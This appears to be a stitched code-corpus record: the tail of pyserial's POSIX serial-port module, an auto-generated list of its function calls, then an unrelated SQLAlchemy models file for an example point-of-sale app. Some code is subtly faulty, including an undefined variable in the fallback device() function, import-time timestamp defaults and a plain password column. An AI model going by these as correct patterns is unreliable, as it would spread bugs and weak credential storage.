support arbitrary serial speeds if int(version[0]) >= 8: def set_special_baudrate(port, baudrate): # use IOKit-specific call to set up high speeds import array, fcntl buf = array.array('i', [baudrate]) IOSSIOSPEED = 0x80045402 #_IOW('T', 2, speed_t) fcntl.ioctl(port.fd, IOSSIOSPEED, buf, 1) else: # version < 8 def set_special_baudrate(port, baudrate): raise ValueError("baud rate not supported") def device(port): return '/dev/cuad%d' % port baudrate_constants = {} elif plat[:6] == 'netbsd': # NetBSD 1.6 testing by Erk def device(port): return '/dev/dty%02d' % port def 
set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} elif plat[:4] == 'irix': # IRIX (partially tested) def device(port): return '/dev/ttyf%d' % (port+1) #XXX different device names depending on flow control def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} elif plat[:2] == 'hp': # HP-UX (not tested) def device(port): return '/dev/tty%dp0' % (port+1) def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} elif plat[:5] == 'sunos': # Solaris/SunOS (confirmed) def device(port): return '/dev/tty%c' % (ord('a')+port) def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} elif plat[:3] == 'aix': # AIX def device(port): return '/dev/tty%d' % (port) def set_special_baudrate(port, baudrate): raise ValueError("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} else: # platform detection has failed... sys.stderr.write("""\ don't know how to number ttys on this system. ! Use an explicit path (eg /dev/ttyS1) or send this information to ! the author of this module: sys.platform = %r os.name = %r serialposix.py version = %s also add the device name of the serial port and where the counting starts for the first serial port. e.g. 'first serial port: /dev/ttyS0' and with a bit luck you can get this module running... """ % (sys.platform, os.name, VERSION)) # no exception, just continue with a brave attempt to build a device name # even if the device name is not correct for the platform it has chances # to work using a string with the real device name as port parameter. def device(portum): return '/dev/ttyS%d' % portnum def set_special_baudrate(port, baudrate): raise SerialException("sorry don't know how to handle non standard baud rate on this platform") baudrate_constants = {} #~ raise Exception, "this module does not run on this platform, sorry." # whats up with "aix", "beos", .... # they should work, just need to know the device names. # load some constants for later use. 
# try to use values from TERMIOS, use defaults from linux otherwise TIOCMGET = hasattr(TERMIOS, 'TIOCMGET') and TERMIOS.TIOCMGET or 0x5415 TIOCMBIS = hasattr(TERMIOS, 'TIOCMBIS') and TERMIOS.TIOCMBIS or 0x5416 TIOCMBIC = hasattr(TERMIOS, 'TIOCMBIC') and TERMIOS.TIOCMBIC or 0x5417 TIOCMSET = hasattr(TERMIOS, 'TIOCMSET') and TERMIOS.TIOCMSET or 0x5418 #TIOCM_LE = hasattr(TERMIOS, 'TIOCM_LE') and TERMIOS.TIOCM_LE or 0x001 TIOCM_DTR = hasattr(TERMIOS, 'TIOCM_DTR') and TERMIOS.TIOCM_DTR or 0x002 TIOCM_RTS = hasattr(TERMIOS, 'TIOCM_RTS') and TERMIOS.TIOCM_RTS or 0x004 #TIOCM_ST = hasattr(TERMIOS, 'TIOCM_ST') and TERMIOS.TIOCM_ST or 0x008 #TIOCM_SR = hasattr(TERMIOS, 'TIOCM_SR') and TERMIOS.TIOCM_SR or 0x010 TIOCM_CTS = hasattr(TERMIOS, 'TIOCM_CTS') and TERMIOS.TIOCM_CTS or 0x020 TIOCM_CAR = hasattr(TERMIOS, 'TIOCM_CAR') and TERMIOS.TIOCM_CAR or 0x040 TIOCM_RNG = hasattr(TERMIOS, 'TIOCM_RNG') and TERMIOS.TIOCM_RNG or 0x080 TIOCM_DSR = hasattr(TERMIOS, 'TIOCM_DSR') and TERMIOS.TIOCM_DSR or 0x100 TIOCM_CD = hasattr(TERMIOS, 'TIOCM_CD') and TERMIOS.TIOCM_CD or TIOCM_CAR TIOCM_RI = hasattr(TERMIOS, 'TIOCM_RI') and TERMIOS.TIOCM_RI or TIOCM_RNG #TIOCM_OUT1 = hasattr(TERMIOS, 'TIOCM_OUT1') and TERMIOS.TIOCM_OUT1 or 0x2000 #TIOCM_OUT2 = hasattr(TERMIOS, 'TIOCM_OUT2') and TERMIOS.TIOCM_OUT2 or 0x4000 TIOCINQ = hasattr(TERMIOS, 'FIONREAD') and TERMIOS.FIONREAD or 0x541B TIOCM_zero_str = struct.pack('I', 0) TIOCM_RTS_str = struct.pack('I', TIOCM_RTS) TIOCM_DTR_str = struct.pack('I', TIOCM_DTR) TIOCSBRK = hasattr(TERMIOS, 'TIOCSBRK') and TERMIOS.TIOCSBRK or 0x5427 TIOCCBRK = hasattr(TERMIOS, 'TIOCCBRK') and TERMIOS.TIOCCBRK or 0x5428 class PosixSerial(SerialBase): """Serial port class POSIX implementation. Serial port configuration is done with termios and fcntl. Runs on Linux and many other Un*x like systems.""" def open(self): """Open port with current settings. 
This may throw a SerialException if the port cannot be opened.""" self.fd = None if self._port is None: raise SerialException("Port must be configured before it can be used.") # open try: self.fd = os.open(self.portstr, os.O_RDWR|os.O_NOCTTY|os.O_NONBLOCK) except Exception as msg: self.fd = None raise SerialException("could not open port %s: %s" % (self._port, msg)) #~ fcntl.fcntl(self.fd, FCNTL.F_SETFL, 0) # set blocking try: self._reconfigurePort() except: try: os.close(self.fd) except: # ignore any exception when closing the port # also to keep original exception that happened when setting up pass self.fd = None raise else: self._isOpen = True #~ self.flushInput() def _reconfigurePort(self): """Set communication parameters on opened port.""" if self.fd is None: raise SerialException("Can only operate on a valid file descriptor") custom_baud = None vmin = vtime = 0 # timeout is done via select if self._interCharTimeout is not None: vmin = 1 vtime = int(self._interCharTimeout * 10) try: iflag, oflag, cflag, lflag, ispeed, ospeed, cc = termios.tcgetattr(self.fd) except termios.error as msg: # if a port is nonexistent but has a /dev file, it'll fail here raise SerialException("Could not configure port: %s" % msg) # set up raw mode / no echo / binary cflag |= (TERMIOS.CLOCAL|TERMIOS.CREAD) lflag &= ~(TERMIOS.ICANON|TERMIOS.ECHO|TERMIOS.ECHOE|TERMIOS.ECHOK|TERMIOS.ECHONL| TERMIOS.ISIG|TERMIOS.IEXTEN) #|TERMIOS.ECHOPRT for flag in ('ECHOCTL', 'ECHOKE'): # netbsd workaround for Erk if hasattr(TERMIOS, flag): lflag &= ~getattr(TERMIOS, flag) oflag &= ~(TERMIOS.OPOST) iflag &= ~(TERMIOS.INLCR|TERMIOS.IGNCR|TERMIOS.ICRNL|TERMIOS.IGNBRK) if hasattr(TERMIOS, 'IUCLC'): iflag &= ~TERMIOS.IUCLC if hasattr(TERMIOS, 'PARMRK'): iflag &= ~TERMIOS.PARMRK # setup baud rate try: ispeed = ospeed = getattr(TERMIOS, 'B%s' % (self._baudrate)) except AttributeError: try: ispeed = ospeed = baudrate_constants[self._baudrate] except KeyError: #~ raise ValueError('Invalid baud rate: %r' % self._baudrate) # may need custom baud rate, it isn't in our list. ispeed = ospeed = getattr(TERMIOS, 'B38400') try: custom_baud = int(self._baudrate) # store for later except ValueError: raise ValueError('Invalid baud rate: %r' % self._baudrate) else: if custom_baud < 0: raise ValueError('Invalid baud rate: %r' % self._baudrate) # setup char len cflag &= ~TERMIOS.CSIZE if self._bytesize == 8: cflag |= TERMIOS.CS8 elif self._bytesize == 7: cflag |= TERMIOS.CS7 elif self._bytesize == 6: cflag |= TERMIOS.CS6 elif self._bytesize == 5: cflag |= TERMIOS.CS5 else: raise ValueError('Invalid char len: %r' % self._bytesize) # setup stopbits if self._stopbits == STOPBITS_ONE: cflag &= ~(TERMIOS.CSTOPB) elif self._stopbits == STOPBITS_ONE_POINT_FIVE: cflag |= (TERMIOS.CSTOPB) # XXX same as TWO.. 
there is no POSIX support for 1.5 elif self._stopbits == STOPBITS_TWO: cflag |= (TERMIOS.CSTOPB) else: raise ValueError('Invalid stop bit specification: %r' % self._stopbits) # setup parity iflag &= ~(TERMIOS.INPCK|TERMIOS.ISTRIP) if self._parity == PARITY_NONE: cflag &= ~(TERMIOS.PARENB|TERMIOS.PARODD) elif self._parity == PARITY_EVEN: cflag &= ~(TERMIOS.PARODD) cflag |= (TERMIOS.PARENB) elif self._parity == PARITY_ODD: cflag |= (TERMIOS.PARENB|TERMIOS.PARODD) else: raise ValueError('Invalid parity: %r' % self._parity) # setup flow control # xonxoff if hasattr(TERMIOS, 'IXANY'): if self._xonxoff: iflag |= (TERMIOS.IXON|TERMIOS.IXOFF) #|TERMIOS.IXANY) else: iflag &= ~(TERMIOS.IXON|TERMIOS.IXOFF|TERMIOS.IXANY) else: if self._xonxoff: iflag |= (TERMIOS.IXON|TERMIOS.IXOFF) else: iflag &= ~(TERMIOS.IXON|TERMIOS.IXOFF) # rtscts if hasattr(TERMIOS, 'CRTSCTS'): if self._rtscts: cflag |= (TERMIOS.CRTSCTS) else: cflag &= ~(TERMIOS.CRTSCTS) elif hasattr(TERMIOS, 'CNEW_RTSCTS'): # try it with alternate constant name if self._rtscts: cflag |= (TERMIOS.CNEW_RTSCTS) else: cflag &= ~(TERMIOS.CNEW_RTSCTS) # XXX should there be a warning if setting up rtscts (and xonxoff etc) fails?? # buffer # vmin "minimal number of characters to be read. = for non blocking" if vmin < 0 or vmin > 255: raise ValueError('Invalid vmin: %r ' % vmin) cc[TERMIOS.VMIN] = vmin # vtime if vtime < 0 or vtime > 255: raise ValueError('Invalid vtime: %r' % vtime) cc[TERMIOS.VTIME] = vtime # activate settings termios.tcsetattr(self.fd, TERMIOS.TCSANOW, [iflag, oflag, cflag, lflag, ispeed, ospeed, cc]) # apply custom baud rate, if any if custom_baud is not None: set_special_baudrate(self, custom_baud) def close(self): """Close port""" if self._isOpen: if self.fd is not None: os.close(self.fd) self.fd = None self._isOpen = False def makeDeviceName(self, port): return device(port) # - - - - - - - - - - - - - - - - - - - - - - - - def inWaiting(self): """Return the number of characters currently in the input buffer.""" #~ s = fcntl.ioctl(self.fd, TERMIOS.FIONREAD, TIOCM_zero_str) s = fcntl.ioctl(self.fd, TIOCINQ, TIOCM_zero_str) return struct.unpack('I',s)[0] # select based implementation, proved to work on many systems def read(self, size=1): """Read size bytes from the serial port. If a timeout is set it may return less characters as requested. With no timeout it will block until the requested number of bytes is read.""" if self.fd is None: raise portNotOpenError read = bytearray() while len(read) < size: ready,_,_ = select.select([self.fd],[],[], self._timeout) # If select was used with a timeout, and the timeout occurs, it # returns with empty lists -> thus abort read operation. # For timeout == 0 (non-blocking operation) also abort when there # is nothing to read. if not ready: break # timeout buf = os.read(self.fd, size-len(read)) # read should always return some data as select reported it was # ready to read when we get to this point. if not buf: # Disconnected devices, at least on Linux, show the # behavior that they are always ready to read immediately # but reading returns nothing. 
raise SerialException('device reports readiness to read but returned no data (device disconnected?)') read.extend(buf) return bytes(read) def write(self, data): """Output the given string over the serial port.""" if self.fd is None: raise portNotOpenError t = len(data) d = data if self._writeTimeout is not None and self._writeTimeout > 0: timeout = time.time() + self._writeTimeout else: timeout = None while t > 0: try: n = os.write(self.fd, d) if timeout: # when timeout is set, use select to wait for being ready # with the time left as timeout timeleft = timeout - time.time() if timeleft < 0: raise writeTimeoutError _, ready, _ = select.select([], [self.fd], [], timeleft) if not ready: raise writeTimeoutError d = d[n:] t = t - n except OSError as v: if v.errno != errno.EAGAIN: raise SerialException('write failed: %s' % (v,)) return len(data) def flush(self): """Flush of file like objects. In this case, wait until all data is written.""" self.drainOutput() def flushInput(self): """Clear input buffer, discarding all that is in the buffer.""" if self.fd is None: raise portNotOpenError termios.tcflush(self.fd, TERMIOS.TCIFLUSH) def flushOutput(self): """Clear output buffer, aborting the current output and discarding all that is in the buffer.""" if self.fd is None: raise portNotOpenError termios.tcflush(self.fd, TERMIOS.TCOFLUSH) def sendBreak(self, duration=0.25): """Send break condition. Timed, returns to idle state after given duration.""" if self.fd is None: raise portNotOpenError termios.tcsendbreak(self.fd, int(duration/0.25)) def setBreak(self, level=1): """Set break: Controls TXD. When active, no transmitting is possible.""" if self.fd is None: raise portNotOpenError if level: fcntl.ioctl(self.fd, TIOCSBRK) else: fcntl.ioctl(self.fd, TIOCCBRK) def setRTS(self, level=1): """Set terminal status line: Request To Send""" if self.fd is None: raise portNotOpenError if level: fcntl.ioctl(self.fd, TIOCMBIS, TIOCM_RTS_str) else: fcntl.ioctl(self.fd, TIOCMBIC, TIOCM_RTS_str) def setDTR(self, level=1): """Set terminal status line: Data Terminal Ready""" if self.fd is None: raise portNotOpenError if level: fcntl.ioctl(self.fd, TIOCMBIS, TIOCM_DTR_str) else: fcntl.ioctl(self.fd, TIOCMBIC, TIOCM_DTR_str) def getCTS(self): """Read terminal status line: Clear To Send""" if self.fd is None: raise portNotOpenError s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str) return struct.unpack('I',s)[0] & TIOCM_CTS != 0 def getDSR(self): """Read terminal status line: Data Set Ready""" if self.fd is None: raise portNotOpenError s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str) return struct.unpack('I',s)[0] & TIOCM_DSR != 0 def getRI(self): """Read terminal status line: Ring Indicator""" if self.fd is None: raise portNotOpenError s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str) return struct.unpack('I',s)[0] & TIOCM_RI != 0 def getCD(self): """Read terminal status line: Carrier Detect""" if self.fd is None: raise portNotOpenError s = fcntl.ioctl(self.fd, TIOCMGET, TIOCM_zero_str) return struct.unpack('I',s)[0] & TIOCM_CD != 0 # - - platform specific - - - - def drainOutput(self): """internal - not portable!""" if self.fd is None: raise portNotOpenError termios.tcdrain(self.fd) def nonblocking(self): """internal - not portable!""" if self.fd is None: raise portNotOpenError fcntl.fcntl(self.fd, FCNTL.F_SETFL, os.O_NONBLOCK) def fileno(self): """For easier use of the serial port instance with select. 
WARNING: this function is not portable to different platforms!""" if self.fd is None: raise portNotOpenError return self.fd def flowControl(self, enable): """manually control flow - when hardware or software flow control is enabled""" if enable: termios.tcflow(self.fd, TERMIOS.TCION) else: termios.tcflow(self.fd, TERMIOS.TCIOFF) # assemble Serial class with the platform specifc implementation and the base # for file-like behavior. for Python 2.6 and newer, that provide the new I/O # library, derrive from io.RawIOBase try: import io except ImportError: # classic version with our own file-like emulation class Serial(PosixSerial, FileLike): pass else: # io library present class Serial(PosixSerial, io.RawIOBase): pass class PosixPollSerial(Serial): """poll based read implementation. not all systems support poll properly. however this one has better handling of errors, such as a device disconnecting while it's in use (e.g. USB-serial unplugged)""" def read(self, size=1): """Read size bytes from the serial port. If a timeout is set it may return less characters as requested. With no timeout it will block until the requested number of bytes is read.""" if self.fd is None: raise portNotOpenError read = bytearray() poll = select.poll() poll.register(self.fd, select.POLLIN|select.POLLERR|select.POLLHUP|select.POLLNVAL) if size > 0: while len(read) < size: # print "\tread(): size",size, "have", len(read) #debug # wait until device becomes ready to read (or something fails) for fd, event in poll.poll(self._timeout*1000): if event & (select.POLLERR|select.POLLHUP|select.POLLNVAL): raise SerialException('device reports error (poll)') # we don't care if it is select.POLLIN or timeout, that's # handled below buf = os.read(self.fd, size - len(read)) read.extend(buf) if ((self._timeout is not None and self._timeout >= 0) or (self._interCharTimeout is not None and self._interCharTimeout > 0)) and not buf: break # early abort on timeout return bytes(read) if __name__ == '__main__': s = Serial(0, baudrate=19200, # baud rate bytesize=EIGHTBITS, # number of data bits parity=PARITY_EVEN, # enable parity checking stopbits=STOPBITS_ONE, # number of stop bits timeout=3, # set a timeout value, None for waiting forever xonxoff=0, # enable software flow control rtscts=0, # enable RTS/CTS flow control ) s.setRTS(1) s.setDTR(1) s.flushInput() s.flushOutput() s.write('hello') sys.stdout.write('%r\n' % s.read(5)) sys.stdout.write('%s\n' % s.inWaiting()) del s
[((32, 7, 32, 27), 'sys.platform.lower', 'sys.platform.lower', ({}, {}), '()', False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((252, 17, 252, 36), 'struct.pack', 'struct.pack', ({(252, 29, 252, 32): '"""I"""', (252, 34, 252, 35): '0'}, {}), "('I', 0)", False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((253, 16, 253, 43), 'struct.pack', 'struct.pack', ({(253, 28, 253, 31): '"""I"""', (253, 33, 253, 42): 'TIOCM_RTS'}, {}), "('I', TIOCM_RTS)", False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((254, 16, 254, 43), 'struct.pack', 'struct.pack', ({(254, 28, 254, 31): '"""I"""', (254, 33, 254, 42): 'TIOCM_DTR'}, {}), "('I', TIOCM_DTR)", False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((44, 14, 44, 40), 'array.array', 'array.array', ({(44, 26, 44, 29): '"""i"""', (44, 31, 44, 39): '[0] * 32'}, {}), "('i', [0] * 32)", False, 'import array, fcntl\n'), ((47, 8, 47, 54), 'FCNTL.ioctl', 'FCNTL.ioctl', ({(47, 20, 47, 27): 'port.fd', (47, 29, 47, 48): 'TERMIOS.TIOCGSERIAL', (47, 50, 47, 53): 'buf'}, {}), '(port.fd, TERMIOS.TIOCGSERIAL, buf)', False, 'import FCNTL\n'), ((409, 8, 409, 101), 'termios.tcsetattr', 'termios.tcsetattr', ({(409, 26, 409, 33): 'self.fd', (409, 35, 409, 50): 'TERMIOS.TCSANOW', (409, 52, 409, 100): '[iflag, oflag, cflag, lflag, ispeed, ospeed, cc]'}, {}), '(self.fd, TERMIOS.TCSANOW, [iflag, oflag, cflag, lflag,\n ispeed, ospeed, cc])', False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((431, 12, 431, 57), 'fcntl.ioctl', 'fcntl.ioctl', ({(431, 24, 431, 31): 'self.fd', (431, 33, 431, 40): 'TIOCINQ', (431, 42, 431, 56): 'TIOCM_zero_str'}, {}), '(self.fd, TIOCINQ, TIOCM_zero_str)', False, 'import array, fcntl\n'), ((497, 8, 497, 50), 'termios.tcflush', 'termios.tcflush', ({(497, 24, 497, 31): 'self.fd', (497, 33, 497, 49): 'TERMIOS.TCIFLUSH'}, {}), '(self.fd, TERMIOS.TCIFLUSH)', False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((504, 8, 504, 50), 'termios.tcflush', 'termios.tcflush', ({(504, 24, 504, 31): 'self.fd', (504, 33, 504, 49): 'TERMIOS.TCOFLUSH'}, {}), '(self.fd, TERMIOS.TCOFLUSH)', False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((539, 12, 539, 58), 'fcntl.ioctl', 'fcntl.ioctl', ({(539, 24, 539, 31): 'self.fd', (539, 33, 539, 41): 'TIOCMGET', (539, 43, 539, 57): 'TIOCM_zero_str'}, {}), '(self.fd, TIOCMGET, TIOCM_zero_str)', False, 'import array, fcntl\n'), ((545, 12, 545, 58), 'fcntl.ioctl', 'fcntl.ioctl', ({(545, 24, 545, 31): 'self.fd', (545, 33, 545, 41): 'TIOCMGET', (545, 43, 545, 57): 'TIOCM_zero_str'}, {}), '(self.fd, TIOCMGET, TIOCM_zero_str)', False, 'import array, fcntl\n'), ((551, 12, 551, 58), 'fcntl.ioctl', 'fcntl.ioctl', ({(551, 24, 551, 31): 'self.fd', (551, 33, 551, 41): 'TIOCMGET', (551, 43, 551, 57): 'TIOCM_zero_str'}, {}), '(self.fd, TIOCMGET, TIOCM_zero_str)', False, 'import array, fcntl\n'), ((557, 12, 557, 58), 'fcntl.ioctl', 'fcntl.ioctl', ({(557, 24, 557, 31): 'self.fd', (557, 33, 557, 41): 'TIOCMGET', (557, 43, 557, 57): 'TIOCM_zero_str'}, {}), '(self.fd, TIOCMGET, TIOCM_zero_str)', False, 'import array, fcntl\n'), ((565, 8, 565, 32), 'termios.tcdrain', 'termios.tcdrain', ({(565, 24, 565, 31): 'self.fd'}, {}), '(self.fd)', False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((571, 8, 571, 58), 'fcntl.fcntl', 'fcntl.fcntl', ({(571, 20, 571, 27): 'self.fd', (571, 29, 571, 42): 'FCNTL.F_SETFL', (571, 44, 571, 57): 'os.O_NONBLOCK'}, {}), '(self.fd, FCNTL.F_SETFL, 
os.O_NONBLOCK)', False, 'import array, fcntl\n'), ((613, 15, 613, 28), 'select.poll', 'select.poll', ({}, {}), '()', False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((58, 18, 58, 64), 'FCNTL.ioctl', 'FCNTL.ioctl', ({(58, 30, 58, 37): 'port.fd', (58, 39, 58, 58): 'TERMIOS.TIOCSSERIAL', (58, 60, 58, 63): 'buf'}, {}), '(port.fd, TERMIOS.TIOCSSERIAL, buf)', False, 'import FCNTL\n'), ((273, 22, 273, 80), 'os.open', 'os.open', ({(273, 30, 273, 42): 'self.portstr', (273, 44, 273, 79): 'os.O_RDWR | os.O_NOCTTY | os.O_NONBLOCK'}, {}), '(self.portstr, os.O_RDWR | os.O_NOCTTY | os.O_NONBLOCK)', False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((306, 61, 306, 87), 'termios.tcgetattr', 'termios.tcgetattr', ({(306, 79, 306, 86): 'self.fd'}, {}), '(self.fd)', False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((432, 15, 432, 35), 'struct.unpack', 'struct.unpack', ({(432, 29, 432, 32): '"""I"""', (432, 33, 432, 34): 's'}, {}), "('I', s)", False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((442, 24, 442, 69), 'select.select', 'select.select', ({(442, 38, 442, 47): '[self.fd]', (442, 48, 442, 50): '[]', (442, 51, 442, 53): '[]', (442, 55, 442, 68): 'self._timeout'}, {}), '([self.fd], [], [], self._timeout)', False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((516, 12, 516, 42), 'fcntl.ioctl', 'fcntl.ioctl', ({(516, 24, 516, 31): 'self.fd', (516, 33, 516, 41): 'TIOCSBRK'}, {}), '(self.fd, TIOCSBRK)', False, 'import array, fcntl\n'), ((518, 12, 518, 42), 'fcntl.ioctl', 'fcntl.ioctl', ({(518, 24, 518, 31): 'self.fd', (518, 33, 518, 41): 'TIOCCBRK'}, {}), '(self.fd, TIOCCBRK)', False, 'import array, fcntl\n'), ((524, 12, 524, 57), 'fcntl.ioctl', 'fcntl.ioctl', ({(524, 24, 524, 31): 'self.fd', (524, 33, 524, 41): 'TIOCMBIS', (524, 43, 524, 56): 'TIOCM_RTS_str'}, {}), '(self.fd, TIOCMBIS, TIOCM_RTS_str)', False, 'import array, fcntl\n'), ((526, 12, 526, 57), 'fcntl.ioctl', 'fcntl.ioctl', ({(526, 24, 526, 31): 'self.fd', (526, 33, 526, 41): 'TIOCMBIC', (526, 43, 526, 56): 'TIOCM_RTS_str'}, {}), '(self.fd, TIOCMBIC, TIOCM_RTS_str)', False, 'import array, fcntl\n'), ((532, 12, 532, 57), 'fcntl.ioctl', 'fcntl.ioctl', ({(532, 24, 532, 31): 'self.fd', (532, 33, 532, 41): 'TIOCMBIS', (532, 43, 532, 56): 'TIOCM_DTR_str'}, {}), '(self.fd, TIOCMBIS, TIOCM_DTR_str)', False, 'import array, fcntl\n'), ((534, 12, 534, 57), 'fcntl.ioctl', 'fcntl.ioctl', ({(534, 24, 534, 31): 'self.fd', (534, 33, 534, 41): 'TIOCMBIC', (534, 43, 534, 56): 'TIOCM_DTR_str'}, {}), '(self.fd, TIOCMBIC, TIOCM_DTR_str)', False, 'import array, fcntl\n'), ((583, 12, 583, 50), 'termios.tcflow', 'termios.tcflow', ({(583, 27, 583, 34): 'self.fd', (583, 36, 583, 49): 'TERMIOS.TCION'}, {}), '(self.fd, TERMIOS.TCION)', False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((585, 12, 585, 51), 'termios.tcflow', 'termios.tcflow', ({(585, 27, 585, 34): 'self.fd', (585, 36, 585, 50): 'TERMIOS.TCIOFF'}, {}), '(self.fd, TERMIOS.TCIOFF)', False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((419, 16, 419, 33), 'os.close', 'os.close', ({(419, 25, 419, 32): 'self.fd'}, {}), '(self.fd)', False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((466, 22, 466, 33), 'time.time', 'time.time', ({}, {}), '()', False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((471, 20, 471, 40), 'os.write', 'os.write', ({(471, 29, 471, 36): 'self.fd', (471, 38, 471, 39): 'd'}, {}), '(self.fd, d)', 
False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((283, 16, 283, 33), 'os.close', 'os.close', ({(283, 25, 283, 32): 'self.fd'}, {}), '(self.fd)', False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((478, 34, 478, 76), 'select.select', 'select.select', ({(478, 48, 478, 50): '[]', (478, 52, 478, 61): '[self.fd]', (478, 63, 478, 65): '[]', (478, 67, 478, 75): 'timeleft'}, {}), '([], [self.fd], [], timeleft)', False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((540, 15, 540, 35), 'struct.unpack', 'struct.unpack', ({(540, 29, 540, 32): '"""I"""', (540, 33, 540, 34): 's'}, {}), "('I', s)", False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((546, 15, 546, 35), 'struct.unpack', 'struct.unpack', ({(546, 29, 546, 32): '"""I"""', (546, 33, 546, 34): 's'}, {}), "('I', s)", False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((552, 15, 552, 35), 'struct.unpack', 'struct.unpack', ({(552, 29, 552, 32): '"""I"""', (552, 33, 552, 34): 's'}, {}), "('I', s)", False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((558, 15, 558, 35), 'struct.unpack', 'struct.unpack', ({(558, 29, 558, 32): '"""I"""', (558, 33, 558, 34): 's'}, {}), "('I', s)", False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((475, 41, 475, 52), 'time.time', 'time.time', ({}, {}), '()', False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((136, 18, 136, 46), 'array.array', 'array.array', ({(136, 30, 136, 33): '"""i"""', (136, 35, 136, 45): '[baudrate]'}, {}), "('i', [baudrate])", False, 'import array, fcntl\n'), ((138, 12, 138, 53), 'fcntl.ioctl', 'fcntl.ioctl', ({(138, 24, 138, 31): 'port.fd', (138, 33, 138, 44): 'IOSSIOSPEED', (138, 46, 138, 49): 'buf', (138, 51, 138, 52): '(1)'}, {}), '(port.fd, IOSSIOSPEED, buf, 1)', False, 'import array, fcntl\n'), ((130, 14, 130, 24), 'os.uname', 'os.uname', ({}, {}), '()', False, 'import sys, os, fcntl, termios, struct, select, errno, time\n'), ((201, 4, 214, 39), 'sys.stderr.write', 'sys.stderr.write', ({(201, 21, 214, 38): '("""don\'t know how to number ttys on this system.\n! Use an explicit path (eg /dev/ttyS1) or send this information to\n! the author of this module:\n\nsys.platform = %r\nos.name = %r\nserialposix.py version = %s\n\nalso add the device name of the serial port and where the\ncounting starts for the first serial port.\ne.g. \'first serial port: /dev/ttyS0\'\nand with a bit luck you can get this module running...\n"""\n % (sys.platform, os.name, VERSION))'}, {}), '(\n """don\'t know how to number ttys on this system.\n! Use an explicit path (eg /dev/ttyS1) or send this information to\n! the author of this module:\n\nsys.platform = %r\nos.name = %r\nserialposix.py version = %s\n\nalso add the device name of the serial port and where the\ncounting starts for the first serial port.\ne.g. \'first serial port: /dev/ttyS0\'\nand with a bit luck you can get this module running...\n"""\n % (sys.platform, os.name, VERSION))', False, 'import sys, os, fcntl, termios, struct, select, errno, time\n')]
electricimp/examples
Older Examples - enter at your own risk/lavender_pos/app/models.py
ebdd01baf64f3aa67f027194457432c7d7501d37
import datetime

from database import Base
from sqlalchemy import Column, String, Integer, ForeignKey, DateTime, Float


class User(Base):
    __tablename__ = 'users'

    id = Column(Integer, primary_key=True)
    first_name = Column(String(255))
    last_name = Column(String(255))
    email = Column(String(255), index=True, unique=True)
    password = Column(String(255))

    def get_id(self):
        """
        Callback for Flask-Login. Represents that unique ID of a given user object.
        It is unicoded as per specification.

        Returns: the unique ID of an object
        """
        return unicode(self.id)

    def is_anonymous(self):
        """
        Callback for Flask-Login. Default to False - we don't deal with any anonymous users.

        Returns: False
        """
        return False

    def is_active(self):
        """
        Callback for Flask-Login. Default to True - we don't deal with non-active users.

        Returns: True
        """
        return True

    def is_authenticated(self):
        """
        Callback for Flask-Login. Should return True unless the object represents
        a user should not be authenticated.

        Returns: True because all objects should be authenticated
        """
        return True


class PendingTransaction(Base):
    __tablename__ = 'pending_transactions'

    id = Column(Integer, primary_key=True)
    barcode = Column(String(10))
    user_id = Column(Integer, ForeignKey('users.id'))
    timestamp = Column(DateTime, nullable=False, default=datetime.datetime.now())
    # Status: 0 - default, 1 - scanned, 2 - claimed
    status = Column(Integer, default=0)
    company = Column(Integer, ForeignKey('vendors.id'))
    amount = Column(Float)


class Transaction(Base):
    __tablename__ = 'transactions'

    id = Column(Integer, primary_key=True)
    user_id = Column(Integer, ForeignKey('users.id'))
    company = Column(Integer, ForeignKey('vendors.id'))
    amount = Column(Float)
    timestamp = Column(DateTime, nullable=False, default=datetime.datetime.now())


class Vendor(Base):
    __tablename__ = 'vendors'

    id = Column(Integer, primary_key=True)
    name = Column(String(255))
    agent_url = Column(String(255))
    secret = Column(String(255))
